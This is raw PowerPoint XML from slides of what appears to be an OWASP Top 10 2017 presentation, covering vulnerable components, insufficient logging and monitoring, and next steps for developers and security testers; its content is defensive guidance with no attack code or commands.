              <a:t>versions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>DependencyCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, etc. Continuously monitor sources like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Subscribe to email alerts for security vulnerabilities related to components you use.</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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>virtual patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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r>
              <a:rPr lang="ru-RU"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
            <a:endParaRPr lang="ru-RU"/>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A9</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Using Components </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">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29486896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Exploitability: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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence:</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Technical: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p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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90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ru-RU" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>be at the top of the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#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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one false login behind. After some days, this may be repeated with a different password.</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#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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Auditable events, such as logins, failed logins, and high-value transactions are not logged.</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Warnings and errors generate no, inadequate, or unclear log messages.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Logs are only stored locally.</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Appropriate alerting thresholds and response escalation processes are not in place or effective.</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Penetration testing and scans by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tools (such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) do not trigger alerts.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The application is unable to detect, escalate, or alert for active attacks in real time or near real time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You are vulnerable to information leakage if you make logging and alerting events visible to a user or an attacker (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-Sensitive Information Exposure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard: V8 Logging and Monitoring</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8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Detailed Error Code</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9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"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0"/>
              </a:rPr>
              <a:t>CWE-223: Omission of Security-relevant Information</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1"/>
              </a:rPr>
              <a:t>CWE-778: Insufficient Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ru-RU" sz="90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ru-RU" sz="90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Ensure all login, access control failures, and server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis.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Ensure high-value transactions have an audit trail with integrity controls to prevent tampering or deletion, such as append-only database tables or similar.</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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>NIST 800-61 rev 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>OWASP AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, web application firewalls such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>ModSecurity with the OWASP ModSecurity Core Rule Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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A10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Insufficient</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Logging &amp; Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1897871955"/>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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence:</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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical:</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p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>industry survey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">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the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90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sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In 2016, identifying a breach took an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>average of 191 days</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – plenty of time for damage to be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6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ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Establish</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> &amp; Use Repeatable Security Processes and Standard Security Controls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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Whether you are new to web application security or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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>To help organizations and developers reduce their application security risks in a cost-effective manner, OWASP has produced numerous </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="sng" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>free and open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="none" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>resources that 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ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>There are numerous additional OWASP resources available for your use. Please visit the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects page</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which lists all the Flagship, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are available on our </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, and many OWASP documents can be ordered in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>hardcopy or as eBooks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">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sz="900" baseline="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>To produce a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" u="sng" baseline="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>secure</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ru-RU" sz="90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as a guide for setting the security requirements for your application(s). If you’re outsourcing, consider the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1" baseline="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Note</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T</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" baseline="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ru-RU" sz="900">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> as a </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sz="900" baseline="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ru-RU" sz="900">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> a</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ru-RU" sz="90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prevention, etc.</a:t>
              </a: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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Standard Security Controls</a:t>
              </a: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sz="900" baseline="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sz="900" baseline="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>The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3"/>
                </a:rPr>
                <a:t>OWASP WebGoat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or the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8"/>
                </a:rPr>
                <a:t>OWASP AppSec Conference</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ru-RU" sz="1000" baseline="0">
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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+D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for Developers</a:t>
            </a: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ru-RU" sz="900" b="1">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ru-RU" sz="900" b="1">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389336162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630">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Establish </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Continuous Application Security Testing</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is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p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>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ru-RU" sz="950" u="sng" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>continuous</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+T</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titel 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Testers</a:t>
            </a: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Consider using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ru-RU" sz="950">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>and the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ru-RU" sz="950">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>as an input and don’t rely on tool vendors to decide what’s important for your business. </a:t>
